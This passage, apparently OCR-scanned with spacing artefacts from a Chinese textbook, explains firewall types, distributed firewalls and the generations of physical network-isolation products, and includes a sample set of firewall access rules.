地 址 .端口 号 和 协议 类 型 等 标志 确定 是 否 人 允许 数据 包 通过 。 只 有 满足 过 滤 逻 辑 的 数据 包 才 
被 转发 到 相应 的 目的 端口 ,其 余数 据 包 则 被 丢弃 。 

@ 应 用 代理 (Application Proxy): 也 叫 应 用 网 关 (Application Gateway) , 它 作 用 在 应 
用 层 ,其 特点 是 完全 阻隔 了 网 络 通信 流 ,通过 对 每 种 应 用 服务 编写 专门 的 代理 程序 ,实现 监 
视 和 控制 应 用 层 通信 流 的 作用 。 实 际 的 应 用 网 关 通 常 由 专用 工作 站 实现 。 

(1) 包 过 滤 防 火 墙 

第 一 代 是 静态 包 过 滤 。 

这 种 类 型 的 防火 墙根 据 定义 好 的 过 滤 规 则 审查 每 个 数据 包 ,以便 确定 其 是 否 与 某 一 条 
包 过 滤 规 则 相 匹 配 。 过 滤 规 则 基于 数据 包 的 报头 信息 进行 制定 。 报 头 信息 中 包括 IP 源 地 
址 IP 目的 地 址 ,传输 协议 (TCP、UDP 和 ICMP 等 )、TCP/UDP 目的 端口 .ICMP 消息 类 型 
等 。 包 过 滤 类 型 的 防火 墙 要 遵循 的 一 条 基本 原则 是 “最 小 特权 原则 ”, 即 明确 允许 哪些 数据 
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包 可 以 通过 ,而 禁止 其 他 的 数据 包 。 

第 二 代 是 动态 包 过 滤 。 

这 种 类 型 的 防火 墙 采用 动态 设置 包 过 滤 规 则 的 方法 ,避免 了 静态 包 过 滤 所 带 来 的 问题 。 
这 种 技术 后 来 发 展 成 为 包 状 态 监 测 (stateful inspection) 技 术 。 采 用 这 种 技术 的 防火 墙 对 其 
建立 的 每 一 个 连接 都 进行 跟踪 ,并 且 根据 需要 可 动态 地 在 过 滤 规 则 中 增加 或 更 新 条 目 。 

(2) 代理 防火 墙 

第 一 代 是 代理 防火 墙 。 

代理 防火 墙 也 叫 应 用 层 网 关 (application gateway) 防 火 墙 。 这 种 防火 墙 通过 一 种 代理 
(Proxy) 技 术 参 与 TCP 连接 的 全 过 程 。 从 内 部 发 出 的 数据 包 经 过 这 样 的 防火 墙 处 理 后 ,就 
好 像 是 来 源 于 防火 墙 外 部 网 一 样 ,从 而 可 以 起 到 隐藏 内 部 网 结构 的 作用 。 这 种 类 型 的 防火 
墙 被 网 络 安全 专家 和 网 络 安全 媒体 公认 为 是 最 安全 的 防火 墙 。 它 的 核心 技术 就 是 代理 服务 
器 技术 。 

所 谓 代理 服务 器 ,是 指 代表 客户 处 理 服务 器 连接 请 求 的 程序 。 当 代理 服务 器 收 到 一 个 
客户 的 连接 请 求 时 ,它们 将 核实 客户 请 求 , 并 经 过 特定 的 安全 化 的 代理 应 用 程序 处 理 连接 请 
求 ,将 处 理 后 的 请 求 发 送 到 真实 的 服务 器 上 ,然后 接收 服务 器 应 答 ,并 做 进一步 处 理 , 最 后 将 
答复 交 给 发 出 请 求 的 最 终 客 户 。 代 理 服 务 器 在 外 部 网 络 向 内 部 网 络 申请 服务 时 发 挥 了 中 间 
转 接 的 作用 。 

代理 防火 墙 最 突出 的 优点 就 是 安全 。 由 于 每 一 个 内 外 网 络 之 间 的 连接 都 要 通过 代理 的 介 
人 和 转换 ,通过 专门 为 特定 的 服务 如 HTTP, 编 写 的 安全 化 的 应 用 程序 进行 处 理 , 然 后 由 防火 
墙 本 身 提交 请 求 和 应 答 , 没 有 给 内 外 网 络 的 计算 机 任何 直接 会 话 的 机 会 ,从 而 避免 了 入 侵 者 使 
用 数据 驱动 类 型 的 攻击 方式 人 侵 内 部 网 。 相 比 之 下 包 过 滤 防 火 墙 是 很 难 彻底 避免 这 一 漏洞 的 。 

代理 防火 墙 的 最 大 缺点 就 是 速度 比较 慢 , 当 用 户 对 内 外 网 络 网 关 的 吞吐 量 要 求 比较 高 
时 (比如 要 求 达到 75 一 100Mb/s 时 ) ,代理 防火 墙 就 会 成 为 内 外 网 络 之 间 通 信 的 瓶颈 。 但 目 
前 用 户 接 入 Internet 的 速度 一 般 都 远 低 于 这 个 数字 。 在 现实 环境 中 ,要 考虑 使 用 包 过 滤 防 
火 墙 来 满足 速度 要 求 的 情况 ,大 部 分 是 高 速 网 [ATM 或 千 兆 以 太 网 等 ) 之 间 的 防火 墙 。 

第 二 代 是 自 适应 代理 防火 墙 。 

自 适应 代理 (adaptive proxy) 是 最 近 在 商业 应 用 防火 墙 中 实现 的 一 种 革命 性 的 技术 。 
它 可 以 结合 代理 防火 墙 的 安全 性 和 包 过 滤 防 火 墙 的 高 速度 等 优点 ,在 毫 不 降低 安全 性 的 基 
础 之 上 将 代理 防火 墙 的 性 能 提高 10 倍 以 上 。 组 成 这 种 类 型 防火 墙 的 基本 要 素 有 : 自 适 应 
代理 服务 器 (adaptive proxy server) 与 动态 包 过 滤器 (dynamic packet filter) 。 

在 自 适应 代理 服务 器 与 动态 包 过 滤器 之 间 存 在 一 个 控制 通道 。 在 对 防火 墙 进行 配置 
时 ,用户 仅 需要 将 所 需要 的 服务 类 型 .安全 级 别 等 信息 通过 相应 代理 服务 器 的 管理 界面 进行 
设置 就 可 以 了 。 然 后 , 自 适应 代理 就 可 以 根据 用 户 的 配置 信息 ,决定 是 使 用 代理 服务 器 从 应 
用 层 代理 请 求 还 是 从 网 络 层 转发 包 。 如 果 是 后 者 , 它 将 动态 地 通知 包 过 滤器 增 减 过 滤 规 则 ， 
以 满足 用 户 对 速度 和 安全 性 的 双重 要 求 。 


2. 按 网 络 体系 结构 进行 分 类 


根据 网 络 体系 结构 来 进行 的 分 类 ,可 以 有 以 下 几 种 类 型 的 防火 墙 。 
(1) 网 络 级 防火 墙 
一 般 是 基于 源 地 址 和 目的 地 址 、 应 用 协议 以 及 每 个 IP 包 的 端口 来 做 出 通过 与 否 的 判 
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断 。 一 个 路 由 器 便 是 一 个 “传统 ”的 网 络 级 防火 墙 ,大 多 数 路 由 器 都 能 通过 对 这 些 信息 进行 
检查 ,来 决定 是 否 将 所 收 到 的 包 进 行 转发 ,但 都 不 能 判断 出 一 个 IP 包 来 自 哪 里 ,去 向 哪里 。 

“先进 ”的 网 络 级 防火 墙 就 可 以 判断 这 一 点 , 它 可 以 提供 内 部 信息 以 说 明 所 通过 的 连接 
状态 和 一 些 数据 流 的 内 容 , 同 时 把 判断 的 信息 同 规则 表 进 行 比较 ,在 规则 表 中 定义 了 各 种 规 
则 来 表明 是 否 允 许 包 的 通过 。 包 过 滤 防 火 墙 检 查 每 一 条 规则 ,直至 发 现 包 中 的 信息 与 某 规 
则 相符 。 如 果 没 有 一 条 规则 符合 ,防火 墙 就 会 使 用 默认 规则 ,一 般 情况 下 ,默认 规则 就 是 要 
求 防火 墙 丢弃 该 包 。 其 次 ,通过 定义 基于 TCP 或 UDP 数据 包 的 端口 号 ,防火 墙 能 够 判断 是 
否 人 允许 建立 特定 的 连接 ,如 Telnet、FTP 连接 。 

下 面 是 某 网 络 级 防火 墙 的 访问 控制 规则 。 

@ 允许 网 络 172. 17. 0. 0 使 用 FTP(21 口 ) 访 问 主机 192. 168. 0. 1 。 

@ 允许 IP 地 址 为 202. 103. 1. 10 和 202. 103. 1. 13 的 用 户 Telnet (23 口 ) 到 主机 
192.168.0.2 上 。 

@ 允许 任何 地 址 的 E-mail(25 口 ) 进 入 主机 192. 168. 0. 3 。 

@ 允许 任何 WWW 数据 (80 口 ) 通 过 。 

@ 不 允许 其 他 数据 包 进 入 。 

网 络 级 防火 墙 简 捷 、 速 度 快 、 费 用 低 , 并 且 对 用 户 透明 ,但 是 对 网 络 的 保护 有 限 ,因为 它 
只 检查 地 址 和 端口 ,并 且 对 网 络 高 层 协议 的 信息 无 理解 能 力 。 

(2) 应 用 级 网 关 

应 用 级 网 关 即 代理 服务 器 , 它 能 够 检查 进出 的 数据 包 , 并 通过 网 关 复 制 传递 数据 ,防止 
在 受信 任 的 服务 器 和 客户 端 与 不 受信 任 的 主机 间 直 接 建立 联系 。 应 用 级 网 关 能 够 理解 应 用 
层 上 的 协议 ,还 能 够 做 一 些 复杂 的 访问 控制 ,并 进行 精细 的 注册 和 审核 。 但 每 一 种 协议 都 需 
要 相应 的 代理 软件 ,并 且 使 用 时 工作 量 大 ,效率 不 如 网 络 级 防火 墙 。 

常用 的 应 用 级 防火 墙 已 经 有 了 相应 的 代理 服务 器 ,如 HTTP、NNTP、FTP、Telnet、 
Rlogin、X-Windows 等 ,但 是 对 于 新 开发 的 应 用 ,还 没有 相应 的 代理 服务 ,它们 将 使 用 网 络 
级 防火 墙 和 一 般 的 代理 服务 。 

应 用 级 网 关 有 较 好 的 访问 控制 ,是 目前 最 安全 的 防火 墙 技术 ,但 实现 很 困难 ,而 且 有 的 
应 用 级 网 关 缺 乏 “ 透 明度 "”。 在 实际 使 用 中 ,用 户 在 受信 任 的 网 络 上 通过 防火 墙 访问 
Internet 时 ,经 常会 发 现存 在 延迟 现象 并 且 必 须 进 行 多 次 登录 (login) 才 能 访问 Internet 或 
Intranet 。 

(3) 电路 级 网 关 

电路 级 网 关 用 来 监控 受信 任 的 客户 端 或 服务 器 与 不 受信 任 的 主机 间 的 TCP 握手 信息 ， 
来 决定 该 会 话 (Session) 是 否 合法 。 电 路 级 网 关 是 在 OSI 模型 中 的 会 话 层 上 过 滤 数 据 包 的 ， 
这 样 比 包 过 滤 防 火 墙 要 高 两 层 。 

实际 上 电路 级 网 关 并 非 作为 一 个 独立 的 产品 存在 , 它 与 其 他 的 应 用 级 网 关 结 合 在 一 起 ， 
如 TrustInformationSystems 公司 的 GauntletInternetFirewall; DEC 公司 的 AltaVista- 
Firewall 等 产品 。 另 外 ,电路 级 网 关 还 提供 了 一 个 重要 的 安全 功能 : 代理 服务 器 (Proxy- 
Server) ,代理 服务 器 实际 上 是 一 个 防火 墙 ,在 其 上 运行 了 一 个 叫做 “地 址 转移 ”的 进程 ,用 来 
将 公司 内 部 所 有 的 IP 地 址 映射 到 一 个 “安全 ”的 IP 地 址 ,这 个 地 址 是 由 防火 墙 使 用 的 。 但 
是 电路 级 网 关 也 存在 着 一 些 缺陷 ,因为 该 网 关 是 在 会 话 层 上 工作 的 ,所 以 它 就 无 法 检查 应 用 
层级 的 数据 包 。 
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(4) 规则 检查 防火 墙 

该 防火 墙 结合 了 包 过 滤 防 火 墙 .电路 级 网 关 和 应 用 级 网 关 的 特点 。 它 同 包 过 滤 防 火 墙 
一 样 ,能 够 在 OSI 网 络 层 上 ,通过 IP 地 址 和 端口 号 过 滤 进 出 的 数据 包 。 它 也 像 电 路 级 网 关 
一 样 ,能 够 检查 SYN 与 和 ACK 标记 和 序列 数字 是 否 逻 辑 有 序 。 当 然 它 也 像 应 用 级 网 关 一 
样 ,可 以 在 OSI 应 用 层 上 检查 数据 包 的 内 容 , 查 看 这 些 内 容 是 否 符合 网 络 的 安全 规则 。 

规则 检查 防火 墙 虽 然 集成 前 三 者 的 特点 ,但 是 不 同 于 应 用 级 网 关 的 是 它 并 不 打破 客户 
端 /服务 器 模式 来 分 析 应 用 层 的 数据 , 它 人 允许 受信 任 的 客户 端 和 不 受信 任 的 主机 建立 直接 连 
接 。 规 则 检查 防火 墙 不 是 依靠 与 应 用 层 有 关 的 代理 ,而 是 依靠 某 种 算法 来 识别 进出 的 应 用 
层 数据 ,这 些 算 法 通过 已 知 合法 数据 包 的 模式 来 比较 进出 数据 包 , 这 样 从 理论 上 就 比 应 用 级 
代理 更 有 效 。 

目前 市 场 上 流行 的 防火 墙 大 多 属于 规则 检查 防火 墙 ,因为 该 防火 墙 对 于 用 户 是 透明 ,而 
且 在 OSI 最 高 层 上 加 密 数据 ,不 需要 去 修改 客户 端的 程序 ,也 不 需要 对 每 个 在 防火 墙 上 运 
行 的 服务 额外 增加 一 个 代理 。 

从 防火 墙 的 发 展 趋势 上 看 ,未 来 的 防火 墙 将 位 于 网 络 级 防火 墙 和 应 用 级 防火 墙 之 间 ,也 
就 是 说 ,网 络 级 防火 墙 将 更 加 能 够 识别 通过 的 信息 ,而 应 用 级 防火 墙 则 在 目前 的 功能 上 向 
“透明 ”“ 低 级 ”方面 发 展 。 最 终 ,防火 墙 将 成 为 一 个 快速 注册 的 稽查 系统 ,可 保护 数据 以 加 
密 方式 通过 ,并 且 使 所 有 组 织 都 可 以 放心 地 在 结 点 间 传 送 数据 。 


12.2 分 布 式 防火 墙 


随 着 计算 机 安全 技术 的 发 展 和 网 络 安全 问题 的 日 益 严 峻 ,用 户 对 防火 墙 功能 要 求 也 相 
应 提高 了 ,不 仅 要 求 对 内 、 外 网 之 间 起 到 防护 作用 ,还 要 求 在 内 网 之 间 , 以 及 客户 端 计算 机 之 
间 都 能 有 一 种 类 似 的 安全 防护 ,这 就 促使 了 分 布 式 防火 墙 (distributed firewalls) 的 产生 。 

分 布 式 防火 墙 是 一 种 主机 驻 留 式 的 安全 系统 ,用 以 保护 企业 网 络 中 的 关键 结 点 服务 器 、 
数据 及 工作 站 免 受 非法 入 侵 的 破坏 。 分 布 式 防 火 墙 通常 应 用 内 核 模式 , 它 位 于 操作 系统 
OSI 栈 的 底部 ,直接 面 对 网 卡 ,并 对 所 有 的 信息 流 进行 过 滤 与 限制 ,无 论 是 来 自 Internet, 还 
是 来 自 内 部 网 络 。 

分 布 式 防火 墙 把 Internet 和 内 部 网 络 均 视 为 “不 友好 的 ”, 它 对 个 人 计算 机 进行 保护 的 
方式 如 同 边界 防火 墙 对 整个 网 络 进行 保护 一 样 。 对 于 Web 服务 器 来 说 ,分 布 式 防火 墙 进行 
配置 后 能 够 阻止 一 些 不 必要 的 协议 ,如 HTTP 和 HTTPS 之 外 的 协议 ,从 而 阻止 了 非法 入 
侵 的 发 生 , 同 时 还 具有 入 侵 检 测 及 防护 功能 。 


1221 分 布 式 防火 墙 的 结构 


分 布 式 防火 墙 目 前 主要 是 以 软件 形式 出 现 的 ,分 布 式 防火 墙 依靠 包 过 滤 、 特 洛 伊 木马 过 
滤 和 脚本 过 滤 三 层 过 滤 检 查 ,保护 个 人 计算 机 在 正常 使 用 网 络 时 不 会 受到 恶意 的 攻击 ,提高 
了 其 网 络 安全 属性 ; 同时 为 方便 管理 ,所 有 分 布 式 防火 墙 的 安全 策略 由 统一 的 中 央 策 略 管 
理 服务 器 进行 设置 和 维护 ,服务 器 由 系统 管理 员 专 人 监管 ,这 样 就 降低 了 分 布 式 防火 墙 的 使 
用 成 本 ,同时 提高 了 安全 保障 能 力 。 这 里 安全 策略 包括 安全 级 别 以 及 相关 的 安全 属性 。 

分 布 式 防火 墙 与 传统 的 边界 防火 墙 不 同 . 它 主要 负责 对 网 络 边 界 、 各 子 网 和 网 络 内 部 各 
结 点 之 间 的 安全 防护 ,所 以 分 布 式 防 火 墙 是 一 个 完整 的 系统 ,而 不 是 一 个 单一 的 产品 。 根 据 
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它 所 需要 完成 的 功能 ,新 的 防火 墙 体系 结构 包含 如 下 几 个 部 分 。 
1. 网 络 防 火 墙 (network firewall) 


这 一 部 分 有 的 公司 采用 的 是 纯 软 件 方式 ,而 有 的 公司 可 以 提供 相应 的 硬件 支持 。 它 是 
用 于 内 部 网 与 外 部 网 之 间 ,以 及 内 部 各 子 网 之 间 的 防护 。 与 传统 边界 式 防火 墙 相 比 , 它 多 了 
一 个 用 于 对 内 部 子 网 之 间 的 安全 防护 层 , 这 样 整个 网 络 的 安全 防护 体系 就 显得 更 加 全 面 , 更 
加 可 靠 。 


2. 主机 防火 墙 Chost firewall) 


同样 这 一 部 分 也 分 为 纯 软 件 和 硬件 两 种 产品 ,用 于 对 网 络 中 的 服务 器 和 台式 机 进行 防 
护 。 这 也 是 传统 边界 式 防火 墙 所 不 具备 的 ,也 算是 对 传统 边界 式 防火 墙 在 安全 体系 方面 的 
一 个 完善 。 它 是 作用 在 同一 内 部 子 网 的 工作 站 与 服务 器 之 间 ,以 确保 内 部 网 络 服务 器 的 安 
全 。 这 样 防火 墙 的 作用 不 仅 是 用 于 内 部 与 外 部 网 之 间 的 防护 ,还 可 应 用 于 内 部 各 子 网 之 间 、 
同一 内 部 子 网 工作 站 与 服务 器 之 间 。 


3. 中 心 管理 (central management) 软 件 


这 是 一 个 服务 器 软件 ,负责 总 体 安 全 策略 的 策划 ,管理 .分 发 以 及 日 志 的 汇总 。 这 是 新 
的 防火 墙 的 管理 功能 ,也 是 以 前 传统 边界 防火 墙 所 不 具备 的 。 这 样 防火 墙 就 可 以 进行 智能 
管理 ,提高 防火 墙 安全 防护 的 灵活 性 。 


12.22 分 布 式 防火 墙 的 特点 
1. 主机 驻 留 


分 布 式 防火 墙 最 主要 的 特点 就 是 采用 主机 驻 留 方式 ,所 以 称 之 为 “主机 防火 墙 ”, 它 的 主 
要 特征 是 驻 留 在 被 保护 的 主机 上 ,该 主机 以 外 的 网 络 , 不 管 是 处 在 网 络 内 部 还 是 网 络 外 部 ， 
都 被 认为 是 不 可 信任 的 ,因此 ,可 以 对 该 主机 上 运行 的 具体 应 用 程序 和 对 外 提供 的 服务 , 制 
定 针对 性 很 强 的 安全 策略 。 主 机 防火 墙 对 分 布 式 防火 墙 体系 结构 的 突出 贡献 是 使 安全 策略 
不 仅仅 停留 在 网 络 与 网 络 之 间 ,而 是 把 安全 策略 推广 延伸 到 每 个 网 络 末端 。 


2. 嵌入 操作 系统 


这 主要 是 针对 目前 的 纯 软 件 分 布 式 防火 墙 来 说 的 ,操作 系统 自身 存在 很 多 安全 漏洞 , 运 
行 在 其 上 的 应 用 软件 无 一 不 受到 威胁 。 

为 了 彻底 堵 住 操作 系统 的 漏洞 ,主机 防火 墙 的 安全 监测 核心 引擎 以 嵌入 操作 系统 内 核 
的 形态 运行 ,直接 接 和 网卡 ,对 所 有 数据 包 进行 检查 后 再 提交 操作 系统 。 为 实现 这 样 的 运行 
机 制 ,防火 墙 厂 商 与 操作 系统 厂商 的 技术 合作 是 必要 的 ,因为 这 需要 一 些 操作 系统 不 公开 的 
内 部 技术 接口 。 不 能 实现 这 种 分 布 式 运行 模式 的 主机 防火 墙 ,由 于 受到 操作 系统 安全 性 的 
制约 ,所 以 存在 着 明显 的 安全 隐患 。 


3. 类 似 于 个 人 防火 墙 
个 人 防火 墙 是 一 种 软件 防火 墙 产品 , 它 是 在 分 布 式 防火 墙 之 前 出 现 的 一 种 防火 墙 产 品 ， 
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它 是 用 来 保护 单一 主机 系统 的 。 分 布 式 防火 墙 针 对 台式 应 用 的 主机 防火 墙 与 个 人 防火 墙 有 
着 相似 之 处 ,如 它们 都 对 应 个 人 系统 ,但 其 差别 又 是 本 质 性 的 。 首 先 它们 的 管理 方式 过 然 不 
同 , 个 人 防火 墙 的 安全 策略 由 系统 使 用 者 自行 设置 ,目的 是 防 外 部 攻击 ,而 针对 台式 应 用 的 
主机 防火 墙 的 安全 策略 是 由 整个 系统 的 管理 员 统 一 安排 和 设置 ,除了 对 该 台式 机 起 到 保护 
作用 外 ,也 可 以 对 该 台式 机 的 对 外 访问 加 以 控制 ,并 且 这 种 安全 机 制 是 台式 机 的 使 用 者 不 可 
见 和 不 可 改动 的 。 其 次 ,不 同 于 个 人 防火 墙 面向 个 人 用 户 的 是 ,针对 台式 机 应 用 的 主机 防火 
墙 是 面向 企业 级 客户 的 , 它 与 分 布 式 防火 墙 其 他 产品 共同 构成 一 个 企业 级 应 用 方案 ,形成 一 
个 安全 策略 统一 管理 中 心 ,安全 检查 机 制 分 散布 置 的 分 布 式 防火 墙 体系 结构 。 


12.23 分 布 式 防火 墙 的 优势 
1. 适用 于 服务 器 托管 


Internet 和 电子 商务 的 发 展 促进 了 Internet 数据 中 心 (DC) 的 迅速 崛起 ,其 主要 业务 之 
一 就 是 服务 器 托管 服务 。 对 服务 器 托管 用 户 而 言 ,该 服务 器 逻辑 上 是 其 企业 网 的 一 部 分 ,不 
过 物理 上 不 在 企业 内 部 ,对 于 这 种 应 用 ,边界 式 防火 墙 解决 方案 就 显得 不 太 合 适 ,而 针对 服 
务 器 的 主机 防火 墙 解决 方案 则 比较 合适 。 

对 于 纯 软 件 分 布 式 防火 墙 用 户 只 需 在 该 服务 器 上 安装 主机 防火 墙 软 件 ,并 根据 该 服务 
器 的 应 用 设置 安全 策略 ,还 可 以 利用 中 心 管理 软件 对 该 服务 器 进行 远程 监控 ,而 不 需 任何 额 
外 租用 新 的 空间 放置 边界 式 防火 墙 。 对 于 硬件 分 布 式 防 火 墙 , 因 其 通常 采用 PCI 卡 ,还 兼 
顾 网 卡 作 用 ,所 以 可 以 直接 搬 在 服务 器 机 箱 里 ,也 就 无 需 单独 的 空间 托管 了 ,这 对 于 企业 来 
说 更 加 实惠 。 


2. 增强 了 系统 安全 性 


分 布 式 防火 墙 增加 了 针对 主机 的 入 侵 检 测 和 防护 功能 ,加 强 了 对 来 自 内 部 攻击 的 防范 。 
在 传统 边界 式 防火 墙 应 用 中 ,企业 内 部 网 络 非 常 容易 受到 有 目的 的 攻击 ,一旦 接 入 了 企业 局 
域 网 的 某 台 计算 机 ,并 获得 这 台 计 算 机 的 控制 权 , 便 可 以 利用 这 台 计 算 机 作为 人 侵 其 他 计算 
机 统 的 跳板 。 而 最 新 的 分 布 式 防火 墙 将 防火 墙 功能 分 布 到 网 络 的 各 个 子 网 、 台 式 机 系统 、 笔 
记 本 以 及 服务 器 上 。 分 布 于 整个 公司 内 的 分 布 式 防火 墙 使 用 户 可 以 方便 地 访问 信息 ,而 不 
会 将 网 络 的 其 他 部 分 暴露 在 非法 入 侵 者 的 面前 。 和 凭借 这 种 端 到 端的 安全 性 能 ,用 户 不 管 是 
通过 内 部 网 ,外 联网 ,虚拟 专用 网 还 是 远程 访问 ,所 实现 的 功能 与 企业 的 互联 不 再 有 任何 
区 别 。 

分 布 式 防火 墙 还 可 以 使 企业 避免 由 于 某 一 台 计算 机 系统 受到 入 侵 , 而 导致 向 整个 网 络 
蔓延 的 情况 发 生 ,同时 也 可 以 使 利用 公共 账号 登录 网 络 的 用 户 无 法 进入 那些 限制 访问 的 计 
算 机 系统 。 

另外 ,由 于 分 布 式 防火 墙 使 用 了 IP 安全 协议 ,所 以 它 能 够 很 好 地 识别 在 各 种 安全 协议 
下 内 部 主机 之 间 端 到 端的 网 络 通信 ,使 各 主机 之 间 的 通信 得 到 了 很 好 的 保护 。 所 以 分 布 式 
防火 墙 有 能 力 防止 各 种 类 型 的 攻击 。 特 别 是 当 使 用 IP 安全 协议 中 的 密码 凭证 来 标志 内 部 
主机 时 ,基于 这 些 标志 的 策略 对 主机 来 说 无 疑 更 具 可 信人 性 。 


3. 消除 了 结构 性 瓶颈 问题 ,提高 了 系统 性 能 
由 于 传统 防火 墙 拥 有 单一 的 接 入 点 ,所 以 无 论 是 对 网 络 的 性 能 还 是 对 网 络 的 可 靠 性 都 
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有 不 利 的 影响 。 目 前 也 有 这 方面 的 研究 并 提供 了 一 些 相应 的 解决 方案 ,从 网 络 性 能 角度 来 
说 , 自 适 应 防火 墙 是 一 种 在 性 能 和 安全 之 间 寻 求 平衡 的 方案 ; 从 网 络 可 靠 性 角度 来 说 ,采用 
多 个 防火 墙 元 余 也 是 一 种 可 行 的 方案 ,但 是 这 样 不 仅 引 入 了 很 多 复杂 性 ,而 且 也 没有 从 根本 
上 解决 问题 。 

分 布 式 防火 墙 则 从 根本 上 去 除了 单一 的 接 人 点 ,从 而 使 这 一 问题 迎刃而解 。 另 一 方面 ， 
分 布 式 防火 墙 还 可 以 针对 各 个 服务 器 及 终端 计算 机 的 不 同 需 求 ,对 防火 墙 进行 最 佳 配置 ,并 
且 在 配置 时 能 够 充分 考虑 到 在 这 些 主机 上 运行 的 应 用 程序 ,这 样 , 便 可 在 保障 网 络 安全 的 前 
提 下 大 大 提高 网 络 运 转速 率 。 


4. 随 系统 扩充 ,提供 了 安全 防护 无 限 扩充 的 能 力 


因为 分 布 式 防火 墙 分 布 在 整个 企业 的 网 络 或 服务 器 中 ,所 以 它 具 有 无 限制 的 扩展 能 力 。 
随 着 网 络 的 增多 ,它们 处 理 负荷 的 能 力也 在 网 络 中 进一步 提高 ,因此 它们 的 高 性 能 可 以 持续 
保持 住 ,而 不 会 像 边界 式 防火 墙 那样 随 着 网 络 规模 的 扩大 而 不 堪 重 负 。 


5. 应 用 更 为 广泛 且 支 持 VPN 通信 


分 布 式 防火 墙 最 重要 的 优势 在 于 它 能 够 保护 物理 拓扑 上 不 属于 内 部 网 络 ,逻辑 上 属于 
内 部 网 络 的 主机 ,这 种 需求 随 着 VPN 的 发 展 越 来 越 多 。 对 这 个 问题 的 传统 处 理 方法 是 ,将 
远程 内 部 主机 和 外 部 主机 之 间 的 通信 依然 通过 防火 墙 隔离 来 控制 接 人 ,而 远程 内 部 主机 和 
防火 墙 之 间 采 用 隧道 技术 来 保证 其 安全 性 。 这 种 方法 使 原本 可 以 直接 通信 的 双方 必须 绕 经 
防火 墙 , 这 样 ,不仅 效率 低 而 且 增加 了 设置 防火 墙 过 滤 规 则 的 难度 。 与 之 相反 ,分 布 式 防火 
墙 的 建立 本 身 就 是 基于 逻辑 网 络 的 概念 ,因为 对 它 而 言 远程 内 部 主机 与 物理 上 的 内 部 主机 
没有 任何 区 别 。 


1224 分 布 式 防火 墙 的 分 类 


分 布 式 防火 墙 有 狭义 和 广义 之 分 。 下 面 将 介绍 广义 分 布 式 防 火 墙 和 狭义 分 布 式 防 
火 墙 。 


1. 广义 分 布 式 防火 墙 


广义 分 布 式 防火 墙 是 一 种 全 新 的 防火 墙 体系 结构 , 它 包 括 网 络 防火 墙 . 主 机 防火 墙 和 中 
心 管理 三 部 分 。 网 络 防火 墙 部 署 于 内 部 网 与 外 部 网 之 间 以 及 内 部 子 网 之 间 。 网 络 防 火 墙 区 
别 于 边界 式 防火 墙 的 特征 在 于 ,网 络 防火 墙 需 支 持 内 部 网 可 能 有 的 IP 和 非 IP 协议 ,而 边界 
式 防火 墙 却 不 需要 。 主 机 防火 墙 对 网 络 中 的 服务 器 和 台式 系统 进行 防护 ,主机 的 物理 位 置 
可 能 在 企业 网 中 ,也 可 能 在 企业 网 外 (如 托管 服务 器 或 移动 办 公 的 便携 机 )。 由 于 边界 式 防 
火 墙 只 是 网 络 中 的 单一 设备 ,所 以 对 其 进行 的 管理 也 只 能 是 局 部 管理 。 对 于 广义 分 布 式 防 
火 墙 来 说 ,每 个 防火 墙 作为 安全 监测 机 制 的 组 成 部 分 ,必须 根据 不 同 的 安全 要 求 布置 在 网 络 
中 任何 需要 的 位 置 上 ,对 广义 分 布 式 防火 墙 的 管理 必须 是 统一 进行 的 ,中 心 管理 是 分 布 式 防 
火 墙 系统 的 核心 ,安全 策略 的 分 发 及 日 志 的 汇总 都 是 中 心 管理 具备 的 功能 。 


2. 狭义 分 布 式 防火 墙 
狭义 分 布 式 防火 墙 是 指 驻 留 在 网 络 主机 (如 服务 器 或 台式 机 ) ,并 对 主机 系统 提供 安全 
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防护 的 软件 产品 , 驻 留 主机 是 这 类 防火 墙 的 重要 特征 。 这 类 防火 墙 将 该 驻 留 主机 以 外 的 其 
他 网 络 都 认为 是 不 可 信任 的 ,并 对 驻 留 主机 运行 的 应 用 程序 和 对 外 提供 的 服务 设 定 针对 性 
很 强 的 安全 策略 。 


12.3 物理 隔离 技术 


12.31 物理 隔离 技术 的 发 展 


物理 隔离 技术 的 发 展 从 开始 到 现在 大 致 可 以 分 为 五 代 产 品 。 

第 一 代 产品 : 主要 采用 双 机 双 网 的 技术 , 即 有 些 单位 采取 的 配置 两 台 计 算 机 并 分 别 连 
接 内 外 两 个 网 络 的 做 法 。 这 种 方式 虽然 能 够 有 效 地 保证 内 外 网 的 物理 隔离 ,但 是 都 存在 着 
一 些 缺 点 ,比如 导致 投资 成 本 的 增加 ,占用 较 大 办 公 空间 等 。 另 外 双 机 的 使 用 会 带 来 很 多 不 
便 , 且 网 络 设置 复杂 ,维护 难度 也 较 大 ,一 旦 出 现 问 题 ,会 使 对 效率 要 求 相当 高 的 政府 ,军队 
和 金融 证 券 等 部 门 受 到 很 大 影响 。 

第 二 代 产 品 : 双 硬 盘 隔 离 卡 。 其 原理 主要 是 在 原 有 计算 机 上 增加 一 块 硬盘 和 一 个 隔离 
卡 来 实现 物理 隔离 ,两 块 硬盘 分 别 对 应 内 外 网 ,用 户 启 动 外 网 时 关闭 内 网 硬盘 ,启动 内 网 时 
关闭 外 网 硬盘 。 此 隔离 方式 需要 用 户 在 原 有 基础 上 再 多 加 一 块 硬盘 ,对 于 一 些 配 置 比 较 高 、 
原 有 硬盘 空间 比较 大 的 计算 机 而 言 ,造成 了 无 谓 的 成 本 浪费 ,而 且 频繁 地 加 电 和 断 电容 易 对 
原 有 硬盘 造成 损坏 。 由 于 双 硬 盘 隔离 卡 存在 很 多 缺点 ,所 以 它 只 能 作为 物理 隔离 技术 发 展 
过 程 中 的 过 渡 产 品 。 

第 三 代 产品 : 单 硬盘 隔离 卡 。 它 是 目前 国内 最 先进 的 客户 端 物理 隔离 产品 ,也 是 国外 
普遍 采取 的 隔离 技术 ,其 实现 原理 是 将 原 计算 机 的 单个 硬盘 从 物理 层 上 分 割 为 公共 和 安全 
两 个 分 区 ,并 安装 两 套 操 作 系统 ,从 而 实现 内 外 网 的 安全 隔离 。 单 硬盘 隔离 卡 有 严密 的 硬盘 
数据 保护 功能 ,有 方便 的 使 用 方式 ,如 使 用 热 启动 切换 两 个 网 络 ,并 有 较 强 的 可 扩展 功能 ,如 
可 实现 低 端的 双 硬 盘 隔 离 卡 不 能 实现 的 数据 安全 传输 功能 等 。 

第 四 、 五 代 产品 : 服务 器 端的 物理 隔离 ,相对 于 客户 端 物理 隔离 而 言 , 服 务 器 端 物 理 隔 
离 更 能 满足 用 户 的 实际 需求 。 它 能 够 让 用 户 在 实现 内 外 网 安全 隔离 的 同时 ,以 较 高 的 速度 
